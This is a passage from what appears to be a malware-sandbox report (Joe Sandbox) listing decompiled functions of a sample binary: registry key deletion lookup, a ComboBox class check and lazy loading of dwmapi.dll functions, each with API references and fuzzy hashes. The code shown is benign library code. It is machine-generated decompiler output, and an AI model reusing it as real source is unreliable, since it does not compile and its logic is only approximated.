				_push(_t9 ^ _t27);
				 *[fs:0x0] =  &_v16;
				_t22 = __ecx;
				_t17 =  *((intOrPtr*)(__ecx + 8));
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					if( *0xe86ee0 != 0) {
						_t25 =  *0xe86edc; // 0x0
					} else {
						_t14 = GetModuleHandleA("Advapi32.dll");
						if(_t14 == 0) {
							_t25 =  *0xe86edc; // 0x0
						} else {
							_t25 = GetProcAddress(_t14, "RegDeleteKeyExA");
							 *0xe86edc = _t25;
						}
						 *0xe86ee0 = 1;
					}
					if(_t25 == 0) {
						_t12 = RegDeleteKeyA( *_t22, _a4);
					} else {
						 *0xe17a64( *_t22, _a4, _t22[1], 0);
						_t12 =  *_t25();
					}
				} else {
					_t12 = E00CAD180(_t17,  *((intOrPtr*)(__ecx)), _a4);
				}
				 *[fs:0x0] = _v16;
				return _t12;
			}

0x00cb80a0
0x00cb80a2
0x00cb80ad
0x00cb80b0
0x00cb80b7
0x00cb80bb
0x00cb80c1
0x00cb80c3
0x00cb80c8
0x00cb80dd
0x00cb8113
0x00cb80df
0x00cb80e4
0x00cb80ec
0x00cb8104
0x00cb80ee
0x00cb80fa
0x00cb80fc
0x00cb80fc
0x00cb810a
0x00cb810a
0x00cb811b
0x00cb8138
0x00cb811d
0x00cb8129
0x00cb812f
0x00cb812f
0x00cb80ca
0x00cb80cf
0x00cb80cf
0x00cb8141
0x00cb814c

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll,8D2643C2,?,00000000,00000000,Function_00167AA4,000000FF,?,00CACDAC,8D2643C2,?,?,?,?,00E08181,000000FF), ref: 00CB80E4
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 00CB80F4

Part of subcall function 00CAD180: GetModuleHandleA.KERNEL32(Advapi32.dll,?,00000000,?,?,00CB80D4,?,?,8D2643C2,?,00000000,00000000,Function_00167AA4,000000FF,?,00CACDAC), ref: 00CAD193
Part of subcall function 00CAD180: GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00CAD1A3

Strings

Advapi32.dll, xrefs: 00CB80DF
RegDeleteKeyExA, xrefs: 00CB80EE

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyExA
API String ID: 1646373207-1984814126
Opcode ID: b815f799942e116712b4c2fe08812fa0fffa9282b19caebe3446c6e0070392fc
Instruction ID: 65d005307f7866972f5f0d6e225f35b18104f237627b911e73ca5cfa44bf0a48
Opcode Fuzzy Hash: b815f799942e116712b4c2fe08812fa0fffa9282b19caebe3446c6e0070392fc
Instruction Fuzzy Hash: 60119339505254EFDB118F1ADC04BDEBB69FB08B90F004125F815B36A0CF719A58DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CBC427 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CBC427(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t18;
				struct HWND__** _t38;
				void* _t42;

				_push(4);
				E00DDD52C(0xe08583, __ebx, __edi, __esi);
				E00CA67E1(_t42 - 0x10);
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t18 = E00CA2BCE(__ebx, _t42 - 0x10, __esi, 0x400);
				E00CA2BA5(__ebx, _t42 - 0x10, 0x400);
				_t38 =  *(_t42 + 8);
				GetClassNameA( *_t38, _t18, 0x400);
				E00CA67F5(_t42 - 0x10, 0xffffffff);
				_t41 =  *((intOrPtr*)(_t42 - 0x10));
				if(E00DEFE3A( *((intOrPtr*)(_t42 - 0x10)), "ComboBox") == 0 || E00DEFE3A(_t41, "ComboBoxEx32") == 0) {
					_t23 = GetWindowLongA( *_t38, 0xfffffff0);
					if(_t38[0xd] > 0 && (_t23 & 0x00000001) == 0) {
						_t38[0xd] = _t38[0xd] & 0x00000000;
					}
				}
				return E00DDD4FA(E00CA2975(_t23, _t41 - 0x10));
			}

0x00cbc427
0x00cbc42e
0x00cbc436
0x00cbc43b
0x00cbc448
0x00cbc453
0x00cbc459
0x00cbc45f
0x00cbc46a
0x00cbc46f
0x00cbc481
0x00cbc498
0x00cbc4a2
0x00cbc4a8
0x00cbc4a8
0x00cbc4a2
0x00cbc4b9

APIs

__EH_prolog3.LIBCMT ref: 00CBC42E
GetClassNameA.USER32(?,00000000,00000400), ref: 00CBC45F
GetWindowLongA.USER32 ref: 00CBC498

Strings

ComboBox, xrefs: 00CBC472
ComboBoxEx32, xrefs: 00CBC483

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClassH_prolog3LongNameWindow
String ID: ComboBox$ComboBoxEx32
API String ID: 297531199-1907415764
Opcode ID: 73a6bed695981ecb2e33dd686bb41b49f74e0adca295501d9e652129eaaddefc
Instruction ID: 1a4a7bc3ad5d4a38c33057b23a26e265c5408d1e42740132061991e1da664175
Opcode Fuzzy Hash: 73a6bed695981ecb2e33dd686bb41b49f74e0adca295501d9e652129eaaddefc
Instruction Fuzzy Hash: 08018075401222ABEB01EB64DD56BFEB374BF16728F140118F561B21E2DF35AA05CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCC53 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCC53(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t11;
				void* _t12;
				void* _t16;
				_Unknown_base(*)()* _t17;

				_t6 =  *0xe87048; // 0x0
				if(_t6 != 0) {
					__imp__DecodePointer(_t6);
					_t17 = _t6;
					L4:
					if(_t17 == 0) {
						L6:
						return 0;
					}
					 *0xe17a64(_a4, _a8, _a12, _a16, _a20);
					return  *_t17();
				}
				_t10 = E00CB1C03(_t12, __ecx, _t16, L"dwmapi.dll");
				if(_t10 == 0) {
					goto L6;
				}
				_t11 = GetProcAddress(_t10, "DwmDefWindowProc");
				_t17 = _t11;
				__imp__EncodePointer(_t17);
				 *0xe87048 = _t11;
				goto L4;
			}

0x00cbcc56
0x00cbcc5e
0x00cbcc8c
0x00cbcc92
0x00cbcc94
0x00cbcc96
0x00cbccb3
0x00000000
0x00cbccb3
0x00cbcca9
0x00000000
0x00cbccaf
0x00cbcc65
0x00cbcc6d
0x00000000
0x00000000
0x00cbcc75
0x00cbcc7b
0x00cbcc7e
0x00cbcc84
0x00000000

APIs

DecodePointer.KERNEL32(00000000), ref: 00CBCC8C

Part of subcall function 00CB1C03: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00CB1C29
Part of subcall function 00CB1C03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB1C39
Part of subcall function 00CB1C03: EncodePointer.KERNEL32(00000000,?,00000000), ref: 00CB1C42

GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 00CBCC75
EncodePointer.KERNEL32(00000000), ref: 00CBCC7E

Strings

DwmDefWindowProc, xrefs: 00CBCC6F
dwmapi.dll, xrefs: 00CBCC60

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmDefWindowProc$dwmapi.dll
API String ID: 1102202064-234806475
Opcode ID: 85a8835b30b9ba177ed22411c95c0d2cf516b32106bb2b7f05eab68e20621a84
Instruction ID: 4951f055ae295ddbe9bd41d8f4b5ee717d13e49ebf0ff8a69174f46767d2c685
Opcode Fuzzy Hash: 85a8835b30b9ba177ed22411c95c0d2cf516b32106bb2b7f05eab68e20621a84
Instruction Fuzzy Hash: 0EF0B43560831AAF8B111FF2EE588DE3F69AF18B51B044421FC1EF2220DB30CE54AB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCD73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCD73(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				void* _t11;
				void* _t15;
				_Unknown_base(*)()* _t16;

				_t5 =  *0xe8705c; // 0x0
				if(_t5 != 0) {
					__imp__DecodePointer(_t5);
					_t16 = _t5;
					L4:
					if(_t16 == 0) {
						L6:
						return 0x80004005;
					}
					 *0xe17a64(_a4, _a8, _a12, _a16);
					return  *_t16();
				}
				_t9 = E00CB1C03(_t11, __ecx, _t15, L"dwmapi.dll");
				if(_t9 == 0) {
					goto L6;
				}
				_t10 = GetProcAddress(_t9, "DwmSetIconicLivePreviewBitmap");
				_t16 = _t10;
				__imp__EncodePointer(_t16);
				 *0xe8705c = _t10;
				goto L4;
			}

0x00cbcd76
0x00cbcd7e
0x00cbcdac
0x00cbcdb2
0x00cbcdb4
0x00cbcdb6
0x00cbcdd0
0x00000000
0x00cbcdd0
0x00cbcdc6
0x00000000
0x00cbcdcc
0x00cbcd85
0x00cbcd8d
0x00000000
0x00000000
0x00cbcd95
0x00cbcd9b
0x00cbcd9e
0x00cbcda4
0x00000000

APIs

DecodePointer.KERNEL32(00000000), ref: 00CBCDAC

Part of subcall function 00CB1C03: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00CB1C29
Part of subcall function 00CB1C03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB1C39
Part of subcall function 00CB1C03: EncodePointer.KERNEL32(00000000,?,00000000), ref: 00CB1C42

GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 00CBCD95
EncodePointer.KERNEL32(00000000), ref: 00CBCD9E

Strings

DwmSetIconicLivePreviewBitmap, xrefs: 00CBCD8F
dwmapi.dll, xrefs: 00CBCD80

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmSetIconicLivePreviewBitmap$dwmapi.dll
API String ID: 1102202064-1757063745
Opcode ID: 1d7d5662b75894904120076f3834c036a4a8f788b595e4b99f56518063e244a9
Instruction ID: 609d69e7dcc01e90a7a821fdebf1646e00ec36aac62fb217b17542a76c32a715
Opcode Fuzzy Hash: 1d7d5662b75894904120076f3834c036a4a8f788b595e4b99f56518063e244a9
Instruction Fuzzy Hash: 2AF0E939544326AF8B115FB2EC088DE3FA9AF08B50B004021FC55F6220DB30DD109BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCE3A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCE3A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				void* _t11;
				void* _t15;
				_Unknown_base(*)()* _t16;

				_t5 =  *0xe87050; // 0x0
				if(_t5 != 0) {
					__imp__DecodePointer(_t5);
					_t16 = _t5;
					L4:
					if(_t16 == 0) {
						L6:
						return 0x80004005;
					}
					 *0xe17a64(_a4, _a8, _a12, _a16);
					return  *_t16();
				}
				_t9 = E00CB1C03(_t11, __ecx, _t15, L"dwmapi.dll");
				if(_t9 == 0) {
					goto L6;
				}
				_t10 = GetProcAddress(_t9, "DwmSetWindowAttribute");
				_t16 = _t10;
				__imp__EncodePointer(_t16);
				 *0xe87050 = _t10;
				goto L4;
			}

0x00cbce3d
0x00cbce45
0x00cbce73
0x00cbce79
0x00cbce7b
0x00cbce7d
0x00cbce97
0x00000000
0x00cbce97
0x00cbce8d
0x00000000
0x00cbce93
0x00cbce4c
0x00cbce54
0x00000000
0x00000000
0x00cbce5c
0x00cbce62
0x00cbce65
0x00cbce6b
0x00000000

APIs

DecodePointer.KERNEL32(00000000), ref: 00CBCE73

Part of subcall function 00CB1C03: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00CB1C29
Part of subcall function 00CB1C03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB1C39
Part of subcall function 00CB1C03: EncodePointer.KERNEL32(00000000,?,00000000), ref: 00CB1C42

GetProcAddress.KERNEL32(00000000,DwmSetWindowAttribute), ref: 00CBCE5C
EncodePointer.KERNEL32(00000000), ref: 00CBCE65

Strings

DwmSetWindowAttribute, xrefs: 00CBCE56
dwmapi.dll, xrefs: 00CBCE47

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmSetWindowAttribute$dwmapi.dll
API String ID: 1102202064-3105884578
Opcode ID: 67c95fbb893d86e808866d4e8db3a0114701c6f9ea29827653ccae98c8e2993f
Instruction ID: b30ed318650f7d907c56aa3ff318ed14e88a6731e8ce405b0842ef947c33685e
Opcode Fuzzy Hash: 67c95fbb893d86e808866d4e8db3a0114701c6f9ea29827653ccae98c8e2993f
Instruction Fuzzy Hash: 01F05E35504756EF8B112FB6EC588EF3FA9AF08B51B144011FC6AB6260DB70CE549BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCDD8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCDD8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				_Unknown_base(*)()* _t4;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				void* _t10;
				void* _t14;
				_Unknown_base(*)()* _t15;

				_t4 =  *0xe87054; // 0x0
				if(_t4 != 0) {
					__imp__DecodePointer(_t4);
					_t15 = _t4;
					L4:
					if(_t15 == 0) {
						L6:
						return 0x80004005;
					}
					 *0xe17a64(_a4, _a8, _a12);
					return  *_t15();
				}
				_t8 = E00CB1C03(_t10, __ecx, _t14, L"dwmapi.dll");
				if(_t8 == 0) {
					goto L6;
				}
				_t9 = GetProcAddress(_t8, "DwmSetIconicThumbnail");
				_t15 = _t9;
				__imp__EncodePointer(_t15);
				 *0xe87054 = _t9;
				goto L4;
			}

0x00cbcddb
0x00cbcde3
0x00cbce11
0x00cbce17
0x00cbce19
0x00cbce1b
0x00cbce32
0x00000000
0x00cbce32
0x00cbce28
0x00000000
0x00cbce2e
0x00cbcdea
0x00cbcdf2
0x00000000
0x00000000
0x00cbcdfa
0x00cbce00
0x00cbce03
0x00cbce09
0x00000000

APIs

DecodePointer.KERNEL32(00000000), ref: 00CBCE11

Part of subcall function 00CB1C03: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00CB1C29
Part of subcall function 00CB1C03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB1C39
Part of subcall function 00CB1C03: EncodePointer.KERNEL32(00000000,?,00000000), ref: 00CB1C42

GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 00CBCDFA
EncodePointer.KERNEL32(00000000), ref: 00CBCE03

Strings

dwmapi.dll, xrefs: 00CBCDE5
DwmSetIconicThumbnail, xrefs: 00CBCDF4

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmSetIconicThumbnail$dwmapi.dll
API String ID: 1102202064-2331651847
Opcode ID: 33652fbd7295d44aab792f7972f667c67f5d21d661840ef7f540fe943949d0b1
Instruction ID: dbe84cb6b7f54d661717d4ab63393880f47d1faf7a1c733a9c0bbdb53c933d10
Opcode Fuzzy Hash: 33652fbd7295d44aab792f7972f667c67f5d21d661840ef7f540fe943949d0b1
Instruction Fuzzy Hash: 6FF08235544356EF8B112FB6AC088DB3FB9AF08B91B008051FD66F6321DB30DE649B90

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCD14 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCD14(void* __ecx, signed int* _a4) {
				_Unknown_base(*)()* _t3;
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				void* _t10;
				void* _t14;
				_Unknown_base(*)()* _t15;

				_t3 =  *0xe8704c; // 0x0
				if(_t3 != 0) {
					__imp__DecodePointer(_t3);
					_t15 = _t3;
					L4:
					if(_t15 == 0) {
						L6:
						 *_a4 =  *_a4 & 0x00000000;
						return 0;
					}
					 *0xe17a64(_a4);
					return  *_t15();
				}
				_t8 = E00CB1C03(_t10, __ecx, _t14, L"dwmapi.dll");
				if(_t8 == 0) {
					goto L6;
				}
				_t9 = GetProcAddress(_t8, "DwmIsCompositionEnabled");
				_t15 = _t9;
				__imp__EncodePointer(_t15);
				 *0xe8704c = _t9;
				goto L4;
			}

0x00cbcd17
0x00cbcd1f
0x00cbcd4d
0x00cbcd53
0x00cbcd55
0x00cbcd57
0x00cbcd68
0x00cbcd6b
0x00000000
0x00cbcd6e
0x00cbcd5e
0x00000000
0x00cbcd64
0x00cbcd26
0x00cbcd2e
0x00000000
0x00000000
0x00cbcd36
0x00cbcd3c
0x00cbcd3f
0x00cbcd45
0x00000000

APIs

DecodePointer.KERNEL32(00000000), ref: 00CBCD4D

Part of subcall function 00CB1C03: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00CB1C29
Part of subcall function 00CB1C03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB1C39
Part of subcall function 00CB1C03: EncodePointer.KERNEL32(00000000,?,00000000), ref: 00CB1C42

GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 00CBCD36
EncodePointer.KERNEL32(00000000), ref: 00CBCD3F

Strings

DwmIsCompositionEnabled, xrefs: 00CBCD30
dwmapi.dll, xrefs: 00CBCD21

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmIsCompositionEnabled$dwmapi.dll
API String ID: 1102202064-1198327662
Opcode ID: fd928f23f3df378b9ed093b2fea7a1bd7d1e82af4ee34ddda388b7f07785cd3e
Instruction ID: 16dea5361a5aa438551f5fd96b7bc52e6b219bb934f87ee28c8c749c650aa062
Opcode Fuzzy Hash: fd928f23f3df378b9ed093b2fea7a1bd7d1e82af4ee34ddda388b7f07785cd3e
Instruction Fuzzy Hash: 2FF05E396487119FC7112F76EC499DE3FA8AF04B52B008031FC56E6260EB34CE448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CBCCB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CBCCB8(void* __ecx, intOrPtr _a4) {
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				void* _t8;
				void* _t12;
				_Unknown_base(*)()* _t13;

				_t2 =  *0xe87058; // 0x0
				if(_t2 != 0) {
					__imp__DecodePointer(_t2);
					_t13 = _t2;
					L4:
					if(_t13 == 0) {
						L6:
						return 0x80004005;
					}
					 *0xe17a64(_a4);
					return  *_t13();
				}
				_t6 = E00CB1C03(_t8, __ecx, _t12, L"dwmapi.dll");
				if(_t6 == 0) {
					goto L6;
				}
				_t7 = GetProcAddress(_t6, "DwmInvalidateIconicBitmaps");
				_t13 = _t7;
				__imp__EncodePointer(_t13);
				 *0xe87058 = _t7;
				goto L4;
			}

0x00cbccbb
0x00cbccc3
0x00cbccf1
0x00cbccf7
0x00cbccf9
0x00cbccfb
0x00cbcd0c
0x00000000
0x00cbcd0c
0x00cbcd02
0x00000000
0x00cbcd08
0x00cbccca
0x00cbccd2
0x00000000
0x00000000
0x00cbccda
0x00cbcce0
0x00cbcce3
0x00cbcce9
0x00000000

APIs

DecodePointer.KERNEL32(00000000), ref: 00CBCCF1

Part of subcall function 00CB1C03: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00CB1C29
Part of subcall function 00CB1C03: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB1C39
Part of subcall function 00CB1C03: EncodePointer.KERNEL32(00000000,?,00000000), ref: 00CB1C42

GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 00CBCCDA
EncodePointer.KERNEL32(00000000), ref: 00CBCCE3

Strings

DwmInvalidateIconicBitmaps, xrefs: 00CBCCD4
dwmapi.dll, xrefs: 00CBCCC5

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$DecodeHandleModule
String ID: DwmInvalidateIconicBitmaps$dwmapi.dll
API String ID: 1102202064-1901905683
Opcode ID: 093b9421c88a680d77e7ad9b775676c8815a8e4bef7e688a3cc358c07f45c50e
Instruction ID: fab0ce60d8c0ac1d0ffa280b037264b63db23bcdc1d51563e850b88d2254981d
Opcode Fuzzy Hash: 093b9421c88a680d77e7ad9b775676c8815a8e4bef7e688a3cc358c07f45c50e
Instruction Fuzzy Hash: 74F037395447129F8B112FB6AD584DE7FAC5B04B517144021FC6AF6251DA20CE4856D5

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0EF8 Relevance: 7.9, APIs: 5, Instructions: 366
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00CF0EF8(void* __ebx, signed int __ecx, signed int __edi, void* __esi, signed int _a4, signed int _a8, struct tagRECT* _a12) {
				signed int _v8;
				struct tagRECT _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _t172;
				signed int _t177;
				intOrPtr _t178;
				long _t182;
				long _t183;
				long _t188;
				long _t189;
				intOrPtr _t191;
				signed int _t193;
				intOrPtr _t194;
				signed int _t195;
				void* _t199;
				signed int _t208;
				signed int _t219;
				void* _t223;
				signed int _t226;
				intOrPtr _t228;
				signed int _t229;
				signed int _t230;
				signed int _t232;
				intOrPtr _t237;
				void* _t238;
				long _t239;
				struct tagRECT* _t241;
				void* _t242;
				signed int _t246;
				long _t248;
				long _t249;
				long _t253;
				long _t254;
				intOrPtr _t256;
				intOrPtr _t262;
				signed int _t266;
				signed int _t271;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				void* _t281;
				intOrPtr* _t291;
				signed int _t294;
				void* _t295;
				void* _t308;
				signed int _t309;
				signed int _t311;

				_t309 = _t311;
				_t172 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t172 ^ _t309;
				_t241 = _a12;
				_t291 = __ecx;
				_t280 = __edi | 0xffffffff;
				_v28 = __ecx;
				_v40 = _t280;
				SetRectEmpty(_t241);
				 *0xe17a64(__edi, __esi, __ebx, _t308);
				_t177 =  *((intOrPtr*)( *((intOrPtr*)( *_t291 + 0x194))))();
				_t246 = _a8;
				_t277 = _t177 & 0x0000a000;
				_v76 = _t277;
				_v52 = _a4;
				_v36 = _t246;
				if(_t246 < 0) {
					_v36 = _v36 & 0x00000000;
				}
				_t294 = _v28;
				_t178 =  *((intOrPtr*)(_t294 + 0xc48));
